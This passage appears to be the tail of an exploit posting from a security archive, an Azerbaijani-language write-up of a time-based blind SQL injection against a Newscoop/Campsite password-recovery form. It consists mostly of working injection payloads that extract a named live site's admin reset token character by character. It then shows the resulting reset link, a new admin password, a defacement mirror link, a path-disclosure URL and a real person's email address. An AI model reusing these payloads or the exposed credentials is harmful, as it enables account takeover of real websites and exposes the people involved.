f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,48,1)='7',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

49-cu simvol: 8


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,49,1)='8',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

50-ci simvol: 3


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,50,1)='3',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================



f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,1,52)='f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password







f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783

















mysql> select length('f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783') \g
+--------------------------------------------------------------+
| length('f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783') |
+--------------------------------------------------------------+
| 50 |
+--------------------------------------------------------------+
1 row in set (0.00 sec)





f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,1,52)='f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password







http://tv.am/admin/password_check_token.php?token=f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783&f_email=karen.sargsyan@gmail.com





Parolun berpasi linkini formalasdiririq:


http://tv.am/admin/password_check_token.php?token=f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783&f_email=karen.sargsyan@gmail.com




Yeni Pass:

new pass for admin: QfIIZWBmO2U


http://zone-h.org/mirror/id/18696985



PATH DISCLOSURE:

http://tv.am/admin/login.php?error_code[]=userpass&request=



Newscoop has encountered a problem.

Please take a minute to send us an email.

Simply copy and paste the error report below and send it to: newscoop-bug@sourcefabric.org.

Thank you.

Error Report
Error ID: 8:Campsite:3.5.3:login.php:136
Error String: Array to string conversion
Time: Tue, 04 Dec 2012 00:47:25 +0400
Backtrace:

camp_report_bug() called at [:]
strlen() called at [/home7/ediospro/public_html/iravunqn/admin-files/login.php:136]
require_once() called at [/home7/ediospro/public_html/iravunqn/admin.php:192]






************** SHA1 IS NOT PANACEA)) ***************

==================THE END===================



================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep & KASIB_OGLAN




Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close